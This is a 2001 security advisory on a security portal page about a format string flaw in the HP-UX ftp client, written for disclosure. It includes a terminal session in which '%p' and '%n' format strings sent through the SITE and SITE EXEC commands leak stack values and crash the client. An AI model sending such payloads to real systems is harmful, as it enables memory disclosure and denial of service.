[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
- read forum
- new topic
- search

- meetings list
- recent additions
- add your info
 top 100 sites
- visit top sites
- sign up now
- members

- add your url
- add domain
- search box
- link to us

- our projects
- free email
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : HP/UX FTP format string vulnerability

Title: HP/UX FTP format string vulnerability
Released by: zorgon
Date: 8th January 2001
Printable version: Click here
HP/UX FTP format string vulnerability

A format string vulnerability exists in ftp. This vulnerability was

discussed with HP labs.

$ uname -a

HP-UX hpotac8 B.11.00 A 9000/785 2004901631 licence pour deux utilisateurs

$ ftp localhost

Connected to localhost.

220 localhost FTP server (Version Wed Feb  9 08:03:34 GMT 2000) ready.

Name (localhost:zorgon):zorgon

331 Password required for zorgon.


230 User zorgon logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> site exec %p %p %p %p

200-40008f10 00000003 00000002 00000001

200  (end of '40008f10 00000003 00000002 00000001')

ftp> site exec %n %n %n %n

Bus error(coredump)


And the 'SITE' command is also vulnerable


ftp> site %p %p %p %p

500 'SITE 40008F0C 00000002 00000002 00000001': command not understood.

ftp> site %n %n %n %n

Bus error(coredump)

$ file core

core:           fichier de vidage de la memoire de'ftp' - recu SIGBUS

The character format strings are not being parsed correctly in the ftp client.

When HP labs fix the problem in the client, the result will be :

ftp>  site exec %n %n %n %n

--->  SITE exec %n %n %n %n

200-%n %n %n %n

200  (end of '%n %n %n %n')


So in this case the ftpd server will not process the character format strings.

The fix will be made in the next release of the ftp client.




(C) 1999-2000 All rights reserved.